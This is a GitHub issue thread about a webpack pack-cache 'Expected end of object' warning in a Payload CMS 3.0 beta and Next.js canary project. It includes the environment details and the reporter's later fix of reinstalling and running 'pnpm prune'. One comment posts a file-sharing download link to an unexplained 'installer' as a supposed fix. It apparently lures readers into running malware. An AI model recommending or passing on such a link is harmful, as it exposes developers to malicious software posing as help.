### ISSUE TITLE
Webpack Caching Issue: "Expected end of object" Error during Navigation

### ISSUE THREAD

**Issue by danielkoller** [payloadcms/payload#8058]
### Environment Info

```text
Binaries:
  Node: 22.7.0
  npm: 10.8.2
  Yarn: N/A
  pnpm: 9.9.0
Relevant Packages:
  payload: 3.0.0-beta.98
  next: 15.0.0-canary.139
  @payloadcms/db-postgres: 3.0.0-beta.98
  @payloadcms/email-nodemailer: 3.0.0-beta.98
  @payloadcms/graphql: 3.0.0-beta.98
  @payloadcms/live-preview: 3.0.0-beta.98
  @payloadcms/live-preview-react: 3.0.0-beta.98
  @payloadcms/next/utilities: 3.0.0-beta.98
  @payloadcms/plugin-form-builder: 3.0.0-beta.98
  @payloadcms/plugin-nested-docs: 3.0.0-beta.98
  @payloadcms/plugin-redirects: 3.0.0-beta.98
  @payloadcms/plugin-seo: 3.0.0-beta.98
  @payloadcms/richtext-lexical: 3.0.0-beta.98
  @payloadcms/translations: 3.0.0-beta.98
  @payloadcms/ui/shared: 3.0.0-beta.98
  react: 19.0.0-rc-7771d3a7-20240827
  react-dom: 19.0.0-rc-7771d3a7-20240827
Operating System:
  Platform: darwin
  Arch: arm64
  Version: Darwin Kernel Version 23.6.0: Mon Jul 29 21:14:30 PDT 2024; root:xnu-10063.141.2~1/RELEASE_ARM64_T6000
  Available memory (MB): 32768
  Available CPU cores: 10
```

### Describe the Bug

I'm encountering a persistent caching issue with Webpack while navigating through different parts of my application, specifically between the admin site and other pages. The following warning is logged in the console:

`<w> [webpack.cache.PackFileCacheStrategy] Caching failed for pack: Error: Expected end of object
<w> (during deserialization of Object)
<w> (during deserialization of webpack/lib/util/registerExternalSerializer webpack-sources/CachedSource)
<w> (during deserialization of Map)
<w> (during deserialization of Object)
<w> (during deserialization of Map)
<w> (during deserialization of webpack/lib/cache/PackFileCacheStrategy PackContentItems)`

I already tried to remove the node packages and next folder but a reinstall didn't help unfortunately. 

I don't know if the problem is Payload or Next in this case and didn't find anything useful on GitHub or StackOverflow. 

### Reproduction Steps

When navigating through different pages or adding content to my Payload Pages or Collections, I occasionally encounter said caching logs.

**Comment by Rockyman-star** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by danielkoller** [comment]
Okay after updating, removing the node modules, next folder and reinstalling and running `pnpm prune` the error is apparently gone. Just a heads up for everyone running into the same problems.
